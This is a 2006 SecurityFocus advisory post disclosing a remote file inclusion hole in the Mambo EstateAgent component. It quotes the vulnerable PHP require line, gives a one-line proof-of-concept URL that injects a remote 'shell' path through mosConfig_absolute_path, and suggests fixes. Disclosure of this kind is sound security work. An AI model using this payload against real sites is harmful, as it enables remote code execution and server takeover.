Mambo Component - EstateAgent Remote File Inclusion Aug 20 2006 02:02AM
Outlaw aria-security net (1 replies)
########################################################################
###################

# Aria-Security.net Advisory #

# Discovered by: O.U.T.L.A.W #

# < www.Aria-security.net > #

# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #

# #

########################################################################
###################

#Software: Mambo Component - EstateAgent

#Attack method:

#Source:

#

# Don't allow direct linking

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

require_once( $mainframe->getPath( 'front_html' ) );

require($mosConfig_absolute_path."/administrator/components/com_estateag
ent/configuration.php");

************************************************************************
************

#Proof of Concept:

#

#www.site.com/com_estateagent/estateagent.php?mosConfig_absolute_path=sh
ell

#

#----------------------------------------------------------

#

#Solutions :

#1 - If you have access on webserver turn register_globals in php.ini off

#2 - You must give a value before put the value of variable in the include function or check and filter

#unnormal entrance out .

#

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]

[ reply ]
Re: Mambo Component - EstateAgent Remote File Inclusion Aug 23 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)


 

Privacy Statement
Copyright 2010, SecurityFocus